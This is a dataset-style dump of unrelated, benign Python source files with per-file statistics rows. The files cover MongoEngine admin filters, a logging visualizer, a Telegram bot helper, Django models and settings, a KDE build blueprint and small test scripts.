flt = {'%s__ne' % self.column.name: None}
return query.filter(**flt)
def operation(self):
return lazy_gettext('empty')
class FilterInList(BaseMongoEngineFilter):
def __init__(self, column, name, options=None, data_type=None):
super(FilterInList, self).__init__(column, name, options, data_type='select2-tags')
def clean(self, value):
return [v.strip() for v in value.split(',') if v.strip()]
def apply(self, query, value):
flt = {'%s__in' % self.column.name: value}
return query.filter(**flt)
def operation(self):
return lazy_gettext('in list')
class FilterNotInList(FilterInList):
def apply(self, query, value):
flt = {'%s__nin' % self.column.name: value}
return query.filter(**flt)
def operation(self):
return lazy_gettext('not in list')
# Customized type filters
class BooleanEqualFilter(FilterEqual, filters.BaseBooleanFilter):
def apply(self, query, value):
flt = {'%s' % self.column.name: value == '1'}
return query.filter(**flt)
class BooleanNotEqualFilter(FilterNotEqual, filters.BaseBooleanFilter):
def apply(self, query, value):
flt = {'%s' % self.column.name: value != '1'}
return query.filter(**flt)
class IntEqualFilter(FilterEqual, filters.BaseIntFilter):
pass
class IntNotEqualFilter(FilterNotEqual, filters.BaseIntFilter):
pass
class IntGreaterFilter(FilterGreater, filters.BaseIntFilter):
pass
class IntSmallerFilter(FilterSmaller, filters.BaseIntFilter):
pass
class IntInListFilter(filters.BaseIntListFilter, FilterInList):
pass
class IntNotInListFilter(filters.BaseIntListFilter, FilterNotInList):
pass
class FloatEqualFilter(FilterEqual, filters.BaseFloatFilter):
pass
class FloatNotEqualFilter(FilterNotEqual, filters.BaseFloatFilter):
pass
class FloatGreaterFilter(FilterGreater, filters.BaseFloatFilter):
pass
class FloatSmallerFilter(FilterSmaller, filters.BaseFloatFilter):
pass
class FloatInListFilter(filters.BaseFloatListFilter, FilterInList):
pass
class FloatNotInListFilter(filters.BaseFloatListFilter, FilterNotInList):
pass
class DateTimeEqualFilter(FilterEqual, filters.BaseDateTimeFilter):
pass
class DateTimeNotEqualFilter(FilterNotEqual, filters.BaseDateTimeFilter):
pass
class DateTimeGreaterFilter(FilterGreater, filters.BaseDateTimeFilter):
pass
class DateTimeSmallerFilter(FilterSmaller, filters.BaseDateTimeFilter):
pass
class DateTimeBetweenFilter(BaseMongoEngineFilter, filters.BaseDateTimeBetweenFilter):
def __init__(self, column, name, options=None, data_type=None):
super(DateTimeBetweenFilter, self).__init__(column,
name,
options,
data_type='datetimerangepicker')
def apply(self, query, value):
start, end = value
flt = {'%s__gte' % self.column.name: start, '%s__lte' % self.column.name: end}
return query.filter(**flt)
class DateTimeNotBetweenFilter(DateTimeBetweenFilter):
def apply(self, query, value):
start, end = value
return query.filter(Q(**{'%s__not__gte' % self.column.name: start}) |
Q(**{'%s__not__lte' % self.column.name: end}))
def operation(self):
return lazy_gettext('not between')
# Base MongoEngine filter field converter
class FilterConverter(filters.BaseFilterConverter):
strings = (FilterLike, FilterNotLike, FilterEqual, FilterNotEqual,
FilterEmpty, FilterInList, FilterNotInList)
int_filters = (IntEqualFilter, IntNotEqualFilter, IntGreaterFilter,
IntSmallerFilter, FilterEmpty, IntInListFilter,
IntNotInListFilter)
float_filters = (FloatEqualFilter, FloatNotEqualFilter, FloatGreaterFilter,
FloatSmallerFilter, FilterEmpty, FloatInListFilter,
FloatNotInListFilter)
bool_filters = (BooleanEqualFilter, BooleanNotEqualFilter)
datetime_filters = (DateTimeEqualFilter, DateTimeNotEqualFilter,
DateTimeGreaterFilter, DateTimeSmallerFilter,
DateTimeBetweenFilter, DateTimeNotBetweenFilter,
FilterEmpty)
def convert(self, type_name, column, name):
filter_name = type_name.lower()
if filter_name in self.converters:
return self.converters[filter_name](column, name)
return None
@filters.convert('StringField', 'EmailField', 'URLField')
def conv_string(self, column, name):
return [f(column, name) for f in self.strings]
@filters.convert('BooleanField')
def conv_bool(self, column, name):
return [f(column, name) for f in self.bool_filters]
@filters.convert('IntField', 'LongField')
def conv_int(self, column, name):
return [f(column, name) for f in self.int_filters]
@filters.convert('DecimalField', 'FloatField')
def conv_float(self, column, name):
return [f(column, name) for f in self.float_filters]
@filters.convert('DateTimeField', 'ComplexDateTimeField')
def conv_datetime(self, column, name):
return [f(column, name) for f in self.datetime_filters]
| 29.486891 | 91 | 0.661247 | 792 | 7,873 | 6.449495 | 0.184343 | 0.064605 | 0.065779 | 0.043265 | 0.379013 | 0.35415 | 0.349843 | 0.310689 | 0.26527 | 0.26527 | 0 | 0.000666 | 0.236886 | 7,873 | 266 | 92 | 29.597744 | 0.849534 | 0.039629 | 0 | 0.355828 | 0 | 0 | 0.045982 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.202454 | false | 0.09816 | 0.030675 | 0.09816 | 0.644172 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 3 |
4fbd1dca6b146e31dce08db94b6db986ccbaf877 | 52 | py | Python | cms/__init__.py | adaptivelogic/django-cms | b7a58b9700755c35b40c145ea81c5bad81271c61 | [
"BSD-3-Clause"
] | 1 | 2015-09-28T10:07:38.000Z | 2015-09-28T10:07:38.000Z | cms/__init__.py | adaptivelogic/django-cms | b7a58b9700755c35b40c145ea81c5bad81271c61 | [
"BSD-3-Clause"
] | null | null | null | cms/__init__.py | adaptivelogic/django-cms | b7a58b9700755c35b40c145ea81c5bad81271c61 | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
__version__ = '2.4.0.beta'
| 13 | 26 | 0.538462 | 8 | 52 | 3 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.093023 | 0.173077 | 52 | 3 | 27 | 17.333333 | 0.465116 | 0.403846 | 0 | 0 | 0 | 0 | 0.357143 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
4fc473676345dd4cde3d8f8baaa727c48ac410b4 | 1,661 | py | Python | utils/tf_visualizer.py | NVlabs/UMR | 15ca8c87c158a238086ef01c9718c9c5773a6659 | [
"BSD-Source-Code"
] | 184 | 2020-09-11T20:35:10.000Z | 2022-03-30T04:26:23.000Z | utils/tf_visualizer.py | gengshan-y/UMR | d858c4ddd56bdac6e3342609f9c02618c279b990 | [
"BSD-Source-Code"
] | 14 | 2020-10-27T15:29:10.000Z | 2022-03-15T08:17:24.000Z | utils/tf_visualizer.py | gengshan-y/UMR | d858c4ddd56bdac6e3342609f9c02618c279b990 | [
"BSD-Source-Code"
] | 27 | 2020-09-13T09:04:25.000Z | 2022-01-21T08:10:41.000Z | # -----------------------------------------------------------
# Copyright (C) 2020 NVIDIA Corporation. All rights reserved.
# Nvidia Source Code License-NC
# Code written by Xueting Li.
# -----------------------------------------------------------
import numpy as np
import os
import ntpath
import time
import termcolor
# convert to colored strings
def red(content): return termcolor.colored(str(content),"red",attrs=["bold"])
def green(content): return termcolor.colored(str(content),"green",attrs=["bold"])
def blue(content): return termcolor.colored(str(content),"blue",attrs=["bold"])
def cyan(content): return termcolor.colored(str(content),"cyan",attrs=["bold"])
def yellow(content): return termcolor.colored(str(content),"yellow",attrs=["bold"])
def magenta(content): return termcolor.colored(str(content),"magenta",attrs=["bold"])
class Visualizer():
def __init__(self, opt):
# self.opt = opt
self.log_name = os.path.join(opt.checkpoint_dir, opt.name, 'loss_log.txt')
with open(self.log_name, "a") as log_file:
now = time.strftime("%c")
log_file.write('================ Training Loss (%s) ================\n' % now)
# scalars: same format as |scalars| of plot_current_scalars
def print_current_scalars(self, epoch, i, scalars):
message = green('(epoch: %d, iters: %d) ' % (epoch, i))
for k, v in scalars.items():
if("lr" in k):
message += '%s: %.6f ' % (k, v)
else:
message += '%s: %.3f ' % (k, v)
print(message)
with open(self.log_name, "a") as log_file:
log_file.write('%s\n' % message)
| 41.525 | 90 | 0.576159 | 207 | 1,661 | 4.541063 | 0.410628 | 0.082979 | 0.140426 | 0.185106 | 0.310638 | 0.310638 | 0.061702 | 0.061702 | 0.061702 | 0 | 0 | 0.004458 | 0.189645 | 1,661 | 39 | 91 | 42.589744 | 0.693908 | 0.20289 | 0 | 0.074074 | 0 | 0 | 0.129278 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.296296 | false | 0 | 0.185185 | 0.222222 | 0.518519 | 0.074074 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 3 |
4fd9da13c9282a2262e37992365c35680ca51392 | 765 | py | Python | src/contexts/backoffice/users/application/createone/UserCreator.py | parada3desu/python-ddd-template | 3da506fbef07b18777e15301e8ba94cc314c6895 | [
"MIT"
] | 2 | 2022-02-26T14:09:43.000Z | 2022-03-13T08:48:21.000Z | src/contexts/backoffice/users/application/createone/UserCreator.py | parada3desu/python-ddd-example | 3da506fbef07b18777e15301e8ba94cc314c6895 | [
"MIT"
] | null | null | null | src/contexts/backoffice/users/application/createone/UserCreator.py | parada3desu/python-ddd-example | 3da506fbef07b18777e15301e8ba94cc314c6895 | [
"MIT"
] | null | null | null | from src.contexts.backoffice.users.domain.UserRepository import UserRepository
from src.contexts.backoffice.users.domain.entities.User import User
from src.contexts.backoffice.users.domain.entities.UserId import UserId
from src.contexts.backoffice.users.domain.entities.UserName import UserName
from src.contexts.shared.domain.EventBus import EventBus
class UserCreator:
def __init__(self, user_repository: UserRepository, event_bus: EventBus):
self.__user_repository = user_repository
self.__event_bus = event_bus
async def run(self, user_id: UserId, name: UserName):
user: User = User.create(user_id, name)
await self.__user_repository.create_one(user)
await self.__event_bus.publish(user.pull_domain_events())
| 42.5 | 78 | 0.784314 | 100 | 765 | 5.75 | 0.32 | 0.06087 | 0.130435 | 0.173913 | 0.292174 | 0.292174 | 0.229565 | 0 | 0 | 0 | 0 | 0 | 0.133333 | 765 | 17 | 79 | 45 | 0.86727 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.076923 | false | 0 | 0.384615 | 0 | 0.538462 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 3 |
4fed4378e82a4d2469bfbbd100de96d4fb972645 | 1,258 | py | Python | bot/util.py | DukeX9/David-TelegramBot-Docker | 5269cde874b5d2082f5c38a86ada1f23943cb650 | [
"MIT"
] | null | null | null | bot/util.py | DukeX9/David-TelegramBot-Docker | 5269cde874b5d2082f5c38a86ada1f23943cb650 | [
"MIT"
] | null | null | null | bot/util.py | DukeX9/David-TelegramBot-Docker | 5269cde874b5d2082f5c38a86ada1f23943cb650 | [
"MIT"
] | null | null | null | from telegram import Chat, ParseMode, Update, Bot
from libs.mwt import MWT
class Utils:
update: Update
def __init__(self, bot: Bot):
self.bot = bot
def set_update(self, update):
print("set_update {}".format(update))
self.update = update
def is_chat_private(self):
return self.get_chat().type == Chat.PRIVATE
def is_user_admin(self):
return self.update.message.from_user.id in self.get_admin_ids()
@MWT(timeout=60 * 15)
def get_admin_ids(self):
return [admin.user.id for admin in self.bot.get_chat_administrators(self.update.message.chat_id)]
def is_chat_all_admins(self):
return self.get_chat().all_members_are_administrators
def get_chat(self):
return self.update.effective_chat
def get_chatroom(self):
return self.update.message.chat
def get_message(self):
return self.update.message
def get_user(self):
return self.update.effective_user
def send_message(self, *args, **kwargs):
kwargs.update({'parse_mode': ParseMode.HTML, 'timeout': 20})
self.bot.send_message(*args, **kwargs)
def matches_user_id(self, owner_id):
return str(self.update.message.from_user.id) == owner_id
| 26.765957 | 105 | 0.674881 | 178 | 1,258 | 4.544944 | 0.275281 | 0.111248 | 0.121137 | 0.123609 | 0.269468 | 0.066749 | 0 | 0 | 0 | 0 | 0 | 0.006091 | 0.217011 | 1,258 | 46 | 106 | 27.347826 | 0.815228 | 0 | 0 | 0 | 0 | 0 | 0.023847 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.387097 | false | 0 | 0.064516 | 0.290323 | 0.806452 | 0.032258 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 3 |
4fef1d2dae2567a7e1e13aace37be93707813b42 | 333 | py | Python | manage.py | hiporox/strawberry-django-plus | c648449034f43af8f94356820119d356f306110a | [
"MIT"
] | 44 | 2022-01-05T18:19:39.000Z | 2022-03-26T11:49:40.000Z | manage.py | hiporox/strawberry-django-plus | c648449034f43af8f94356820119d356f306110a | [
"MIT"
] | 29 | 2022-01-19T21:48:25.000Z | 2022-03-30T15:25:51.000Z | manage.py | hiporox/strawberry-django-plus | c648449034f43af8f94356820119d356f306110a | [
"MIT"
] | 5 | 2022-02-22T05:32:04.000Z | 2022-03-30T14:21:32.000Z | #!/usr/bin/env python3
"""Entrypoint for the demo app."""
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("_PERSISTENT_DB", "1")
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "demo.settings")
from django.core.management import execute_from_command_line
execute_from_command_line(sys.argv)
| 23.785714 | 68 | 0.744745 | 45 | 333 | 5.111111 | 0.666667 | 0.078261 | 0.165217 | 0.191304 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.00692 | 0.132132 | 333 | 13 | 69 | 25.615385 | 0.788927 | 0.15015 | 0 | 0 | 0 | 0 | 0.209386 | 0.079422 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.428571 | 0 | 0.428571 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 3 |
4ff4d74d54ab18b0c0685dcb5f4806bf1e5ec710 | 545 | py | Python | tests/basics/bytes_compare3.py | geowor01/micropython | 7fb13eeef4a85f21cae36f1d502bcc53880e1815 | [
"MIT"
] | 7 | 2019-10-18T13:41:39.000Z | 2022-03-15T17:27:57.000Z | tests/basics/bytes_compare3.py | geowor01/micropython | 7fb13eeef4a85f21cae36f1d502bcc53880e1815 | [
"MIT"
] | null | null | null | tests/basics/bytes_compare3.py | geowor01/micropython | 7fb13eeef4a85f21cae36f1d502bcc53880e1815 | [
"MIT"
] | 2 | 2020-06-23T09:10:15.000Z | 2020-12-22T06:42:14.000Z | # Based on MicroPython config option, comparison of str and bytes
# or vice versa may issue a runtime warning. On CPython, if run as
# "python3 -b", only comparison of str to bytes issues a warning,
# not the other way around (while exactly comparison of bytes to
# str would be the most common error, as in sock.recv(3) == "GET").
# Update: the issue above with CPython apparently happens in REPL,
# when run as a script, both lines issue a warning.
if ("123" == b"123" or b"123" == "123"):
print("FAIL")
raise SystemExit
print("PASS") | 45.416667 | 67 | 0.711927 | 92 | 545 | 4.217391 | 0.652174 | 0.092784 | 0.07732 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.031746 | 0.190826 | 545 | 12 | 68 | 45.416667 | 0.848073 | 0.8 | 0 | 0 | 0 | 0 | 0.196078 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.25 | 0 | 0 | 0 | 0.5 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 1 | 0 | 3 |
8b06b23189486abb08b18059d5099ddb818c14a2 | 1,057 | py | Python | popupforms/phonebook/models.py | edcodes/Django-PopUp-Forms | 4361b847efdff56d111e28afb38383905c4751e1 | [
"Apache-2.0"
] | 1 | 2022-03-15T14:21:26.000Z | 2022-03-15T14:21:26.000Z | popupforms/phonebook/models.py | edcodes/Django-PopUp-Forms | 4361b847efdff56d111e28afb38383905c4751e1 | [
"Apache-2.0"
] | null | null | null | popupforms/phonebook/models.py | edcodes/Django-PopUp-Forms | 4361b847efdff56d111e28afb38383905c4751e1 | [
"Apache-2.0"
] | null | null | null | from django.db import models
from django.contrib.auth.models import User
from django.urls import reverse
class PhoneBook(models.Model):
name = models.CharField(max_length=20, null=False, blank=False , db_index=True, verbose_name='Name')
last_name= models.CharField(max_length=20, null=False, blank=False , db_index=True, verbose_name='Last Name')
phone = models.CharField(max_length=20, null=False, blank=False , db_index=True, verbose_name='Phone Number')
address = models.CharField(max_length=200, null=True, blank=True , verbose_name='Address')
email = models.CharField(max_length=100, null=True, blank=True , verbose_name='Email')
note = models.CharField(max_length=100, null=True, blank=True , verbose_name='Note')
creator = models.ForeignKey(User , on_delete=models.PROTECT, verbose_name='Creator')
class Meta:
ordering = ['name']
def __str__(self):
return str(self.name) + str(self.last_name)
def get_absolute_url(self):
return reverse('phonebook-detail',kwargs={'pk':self.pk})
| 42.28 | 113 | 0.726585 | 150 | 1,057 | 4.953333 | 0.326667 | 0.103634 | 0.145357 | 0.193809 | 0.467026 | 0.467026 | 0.429341 | 0.429341 | 0.429341 | 0.429341 | 0 | 0.016593 | 0.144749 | 1,057 | 24 | 114 | 44.041667 | 0.80531 | 0 | 0 | 0 | 0 | 0 | 0.066288 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.117647 | false | 0 | 0.176471 | 0.117647 | 0.941176 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 3 |
8b0f1b26ccba9442f47816c46d70db223d3a7d42 | 42 | py | Python | temp.py | Aooyh/temp_pro | 2cd4b5533666bf987be34d65d4ca9d6cf9094deb | [
"MIT"
] | null | null | null | temp.py | Aooyh/temp_pro | 2cd4b5533666bf987be34d65d4ca9d6cf9094deb | [
"MIT"
] | null | null | null | temp.py | Aooyh/temp_pro | 2cd4b5533666bf987be34d65d4ca9d6cf9094deb | [
"MIT"
] | null | null | null | name = 'yangghao'
gender = 'male'
age= 22
| 10.5 | 17 | 0.642857 | 6 | 42 | 4.5 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.058824 | 0.190476 | 42 | 3 | 18 | 14 | 0.735294 | 0 | 0 | 0 | 0 | 0 | 0.285714 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
8b223857cae3fac96a22e9c1453e910795c5c612 | 134 | py | Python | tests/test_lol_status.py | xNinjaKittyx/aioleague | 0566ba3068a865e8c9821c37285dc2c97d0c70bd | [
"MIT"
] | 1 | 2020-10-08T11:13:25.000Z | 2020-10-08T11:13:25.000Z | tests/test_lol_status.py | xNinjaKittyx/aioleague | 0566ba3068a865e8c9821c37285dc2c97d0c70bd | [
"MIT"
] | null | null | null | tests/test_lol_status.py | xNinjaKittyx/aioleague | 0566ba3068a865e8c9821c37285dc2c97d0c70bd | [
"MIT"
] | null | null | null |
import pytest
@pytest.mark.asyncio
async def test_get_shard_data(session):
obj = await session.get_shard_data()
print(obj)
| 14.888889 | 40 | 0.746269 | 20 | 134 | 4.75 | 0.7 | 0.168421 | 0.252632 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.164179 | 134 | 8 | 41 | 16.75 | 0.848214 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.2 | 0 | 0.2 | 0.2 | 1 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
8b25bc3f119553032e415cf79f19e2a2a95242aa | 234 | py | Python | Python3/专利检索爬虫/solvecsvFUCKED.py | BillChen2K/LearningRepo | af9abda76c9d18fa237f7b199d5634bda0a13f67 | [
"MIT"
] | 11 | 2020-05-02T20:06:07.000Z | 2021-06-24T10:01:29.000Z | Python3/专利检索爬虫/solvecsvFUCKED.py | megan2019/LearningRepo | af9abda76c9d18fa237f7b199d5634bda0a13f67 | [
"MIT"
] | null | null | null | Python3/专利检索爬虫/solvecsvFUCKED.py | megan2019/LearningRepo | af9abda76c9d18fa237f7b199d5634bda0a13f67 | [
"MIT"
] | 6 | 2020-06-04T04:29:28.000Z | 2020-11-15T08:15:01.000Z | from lxml import etree
import lxml
import pickle
with open('/Users/billchen/OneDrive/Workspace/LearningRepo/Python3/专利检索爬虫/20050101_20101231_B09B_PAGE1.pickle', 'rb') as f:
source = ''
p = pickle.load(f)
html = etree.HTML(p)
| 26 | 123 | 0.747863 | 34 | 234 | 5.058824 | 0.735294 | 0.116279 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.098522 | 0.132479 | 234 | 8 | 124 | 29.25 | 0.748768 | 0 | 0 | 0 | 0 | 0 | 0.42735 | 0.418803 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.428571 | 0 | 0.428571 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 3 |
8b3db55454b5827be3e10d42c064e5be9ce66f7c | 84 | py | Python | apps/lk/apps.py | DaniilGorokhov/CaloryHelper | 6bf5ddce85479508b6498c3e4b2e0f4e5dd01b51 | [
"MIT"
] | null | null | null | apps/lk/apps.py | DaniilGorokhov/CaloryHelper | 6bf5ddce85479508b6498c3e4b2e0f4e5dd01b51 | [
"MIT"
] | null | null | null | apps/lk/apps.py | DaniilGorokhov/CaloryHelper | 6bf5ddce85479508b6498c3e4b2e0f4e5dd01b51 | [
"MIT"
] | 1 | 2021-02-15T17:40:23.000Z | 2021-02-15T17:40:23.000Z | from django.apps import AppConfig
class LkConfig(AppConfig):
name = 'apps.lk'
| 14 | 33 | 0.72619 | 11 | 84 | 5.545455 | 0.818182 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.178571 | 84 | 5 | 34 | 16.8 | 0.884058 | 0 | 0 | 0 | 0 | 0 | 0.083333 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.333333 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 3 |
8c704e2d09c5de7202594d009e152f1ef9b1d0db | 901 | py | Python | kde/kdesdk/kcachegrind/kcachegrind.py | wrobelda/craft-blueprints-kde | 366f460cecd5baebdf3a695696767c8c0e5e7c7e | [
"BSD-2-Clause"
] | 14 | 2017-09-04T09:01:03.000Z | 2022-01-04T20:09:00.000Z | kde/kdesdk/kcachegrind/kcachegrind.py | wrobelda/craft-blueprints-kde | 366f460cecd5baebdf3a695696767c8c0e5e7c7e | [
"BSD-2-Clause"
] | 14 | 2017-12-15T08:11:22.000Z | 2020-12-29T19:11:13.000Z | kde/kdesdk/kcachegrind/kcachegrind.py | wrobelda/craft-blueprints-kde | 366f460cecd5baebdf3a695696767c8c0e5e7c7e | [
"BSD-2-Clause"
] | 19 | 2017-09-05T19:16:21.000Z | 2020-10-18T12:46:06.000Z | import info
class subinfo(info.infoclass):
def setTargets(self):
self.versionInfo.setDefaultValues()
self.description = "GUI to profilers such as Valgrind"
self.defaultTarget = 'master'
def setDependencies(self):
self.runtimeDependencies["libs/qt5/qtbase"] = None
self.runtimeDependencies["kde/frameworks/tier1/karchive"] = None
self.runtimeDependencies["kde/frameworks/tier1/kcoreaddons"] = None
self.runtimeDependencies["kde/frameworks/tier2/kdoctools"] = None
self.runtimeDependencies["kde/frameworks/tier1/kwidgetsaddons"] = None
self.runtimeDependencies["kde/frameworks/tier3/kxmlgui"] = None
self.runtimeDependencies["kde/frameworks/tier4/kdelibs4support"] = None
from Package.CMakePackageBase import *
class Package(CMakePackageBase):
def __init__(self):
CMakePackageBase.__init__(self)
| 34.653846 | 79 | 0.720311 | 87 | 901 | 7.367816 | 0.471264 | 0.25117 | 0.25273 | 0.280811 | 0.397816 | 0.210608 | 0 | 0 | 0 | 0 | 0 | 0.010753 | 0.174251 | 901 | 25 | 80 | 36.04 | 0.850806 | 0 | 0 | 0 | 0 | 0 | 0.27081 | 0.210877 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0.111111 | 0 | 0.388889 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
8c8a3fa18a644dc53d849dea29bb8a71c89d9833 | 182 | py | Python | experiments/runtests.py | MadhuNimmo/jalangi2 | bbe8350b8ede5d978c1b3923780f277aacb1d074 | [
"Apache-2.0"
] | null | null | null | experiments/runtests.py | MadhuNimmo/jalangi2 | bbe8350b8ede5d978c1b3923780f277aacb1d074 | [
"Apache-2.0"
] | null | null | null | experiments/runtests.py | MadhuNimmo/jalangi2 | bbe8350b8ede5d978c1b3923780f277aacb1d074 | [
"Apache-2.0"
] | null | null | null | from subprocess import call
def call_fail(l):
if call(l) != 0:
print "{} failed".format(" ".join(l))
exit(1)
call_fail(["python", "experiments/func_test.py"])
| 18.2 | 49 | 0.598901 | 26 | 182 | 4.076923 | 0.769231 | 0.150943 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.014085 | 0.21978 | 182 | 9 | 50 | 20.222222 | 0.732394 | 0 | 0 | 0 | 0 | 0 | 0.21978 | 0.131868 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.166667 | null | null | 0.166667 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
8cbacff4d48c09219380b49c7b56749002e1874f | 302 | py | Python | instagram_api/response/model/rewrite_rule.py | Yuego/instagram_api | b53f72db36c505a2eb24ebac1ba8267a0cc295bb | [
"MIT"
] | 13 | 2019-08-07T21:24:34.000Z | 2020-12-12T12:23:50.000Z | instagram_api/response/model/rewrite_rule.py | Yuego/instagram_api | b53f72db36c505a2eb24ebac1ba8267a0cc295bb | [
"MIT"
] | null | null | null | instagram_api/response/model/rewrite_rule.py | Yuego/instagram_api | b53f72db36c505a2eb24ebac1ba8267a0cc295bb | [
"MIT"
] | null | null | null | from ..mapper import PropertyMapper, ApiInterfaceBase
from ..mapper.types import Timestamp, AnyType
__all__ = ['RewriteRule', 'RewriteRuleInterface']
class RewriteRuleInterface(ApiInterfaceBase):
matcher: str
replacer: str
class RewriteRule(PropertyMapper, RewriteRuleInterface):
pass
